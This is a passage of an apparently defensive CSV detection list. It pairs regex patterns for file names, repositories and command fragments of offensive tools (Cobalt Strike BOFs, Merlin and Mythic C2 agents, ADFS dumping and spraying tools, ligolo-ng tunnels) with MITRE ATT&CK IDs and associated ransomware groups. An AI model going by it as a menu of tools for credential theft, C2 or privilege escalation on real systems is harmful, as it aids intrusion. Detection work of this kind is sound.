exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","5171" "*/Add-KeeThiefLurker.ps1*",".{0,1000}\/Add\-KeeThiefLurker\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - 
TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","5172" "*/AddNewAdminUser.ahk*",".{0,1000}\/AddNewAdminUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5173" "*/Add-RemoteRegBackdoor.ps1*",".{0,1000}\/Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","5174" "*/address-info.nse*",".{0,1000}\/address\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5175" "*/AddScriptToRegistry.ahk*",".{0,1000}\/AddScriptToRegistry\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","5176" "*/AddTrustedDomain.py*",".{0,1000}\/AddTrustedDomain\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","5177" "*/AddTrustedDomain.vba*",".{0,1000}\/AddTrustedDomain\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","5178" "*/AddUser-Bof.*",".{0,1000}\/AddUser\-Bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 
- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","5179" "*/AddUser-Bof/*",".{0,1000}\/AddUser\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","N/A","10","10","71","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z","5180" "*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","5181" "*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","5182" "*/adeleg.git*",".{0,1000}\/adeleg\.git.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","5183" "*/adeleg.pdb*",".{0,1000}\/adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","5184" "*/ADeleginator.git*",".{0,1000}\/ADeleginator\.git.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","5185" "*/adfsbrute.git*",".{0,1000}\/adfsbrute\.git.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","1","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","5187" "*/adfsbrute.py*",".{0,1000}\/adfsbrute\.py.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","1","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","5188" 
"*/ADFSDump.exe*",".{0,1000}\/ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5189" "*/ADFSDump.exe*",".{0,1000}\/ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5190" "*/ADFSDump.git*",".{0,1000}\/ADFSDump\.git.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","5191" "*/ADFSDump-PS.git*",".{0,1000}\/ADFSDump\-PS\.git.{0,1000}","offensive_tool_keyword","ADFSDump-PS","ADFSDump to assist with GoldenSAML","T1078 - T1552.004 - T1558.004","TA0006 ","N/A","N/A","Credential Access","https://github.com/ZephrFish/ADFSDump-PS","1","1","N/A","N/A","10","1","31","8","2024-05-20T00:00:19Z","2024-05-19T00:46:28Z","5192" 
"*/ADFSpoof.py*",".{0,1000}\/ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","5193" "*/ADFSpray*",".{0,1000}\/ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","5194" "*/ADFSRelay.git*",".{0,1000}\/ADFSRelay\.git.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","5195" "*/ADFSRelay.go*",".{0,1000}\/ADFSRelay\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. 
ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","Black Basta","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","N/A","10","2","179","15","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z","5196" "*/adfs-spray.py*",".{0,1000}\/adfs\-spray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","5197" "*/ADHunt.git*",".{0,1000}\/ADHunt\.git.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","5199" "*/adhunt.py*","\/adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Environments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","5200" "*/adidnsdump.git*",".{0,1000}\/adidnsdump\.git.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","5201" "*/ad-ldap-enum.git*",".{0,1000}\/ad\-ldap\-enum\.git.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","5202" "*/adlogin.ps1*",".{0,1000}\/adlogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","5203" "*/adm2sys.py*",".{0,1000}\/adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","5204" "*/admin/smb/ms17_010_command*",".{0,1000}\/admin\/smb\/ms17_010_command.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5205" "*/admin_persistence_winlogon.c*",".{0,1000}\/admin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","5206" "*/Admin2Sys.git*",".{0,1000}\/Admin2Sys\.git.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTHORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","N/A","10","1","54","19","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z","5207" "*/admin-panels.txt*",".{0,1000}\/admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application 
fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","5208" "*/adPEAS.git*",".{0,1000}\/adPEAS\.git.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","5209" "*/adPEAS.ps1*",".{0,1000}\/adPEAS\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","5210" "*/adPEAS-Light.ps1*",".{0,1000}\/adPEAS\-Light\.ps1.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","5211" "*/ADSearch.exe*",".{0,1000}\/ADSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","5215" "*/ADSearch.exe*",".{0,1000}\/ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","5216" "*/ADSearch.git*",".{0,1000}\/ADSearch\.git.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","N/A","6","536","57","2024-09-25T16:13:13Z","2020-06-17T22:21:41Z","5217" "*/aerosol.py*",".{0,1000}\/aerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#linux","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","5220" "*/afp-brute.nse*",".{0,1000}\/afp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5221" "*/afp-ls.nse*",".{0,1000}\/afp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5222" "*/afp-path-vuln.nse*",".{0,1000}\/afp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5223" "*/afp-serverinfo.nse*",".{0,1000}\/afp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5224" "*/afp-showmount.nse*",".{0,1000}\/afp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5225" "*/afrog-pocs/*",".{0,1000}\/afrog\-pocs\/.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1083 - T1065 - T1204 - T1046","TA0007 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/zan8in/afrog","1","1","N/A","N/A","N/A","10","3791","414","2025-04-22T07:32:19Z","2022-02-24T06:00:32Z","5226" "*/agent -connect http* --proxy*",".{0,1000}\/agent\s\-connect\shttp.{0,1000}\s\-\-proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","5227" "*/agent.ps1.oct*",".{0,1000}\/agent\.ps1\.oct.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","5228" "*/agent/C/src/*",".{0,1000}\/agent\/C\/src\/.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","5230" "*/agent/stagers/dropbox.py*",".{0,1000}\/agent\/stagers\/dropbox\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as resource. 
along with an automatic download routine simulating a user clicking on the embedded resource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","5234" "*/agent_code/Apollo/*",".{0,1000}\/agent_code\/Apollo\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5235" "*/agent_code/Athena*",".{0,1000}\/agent_code\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - 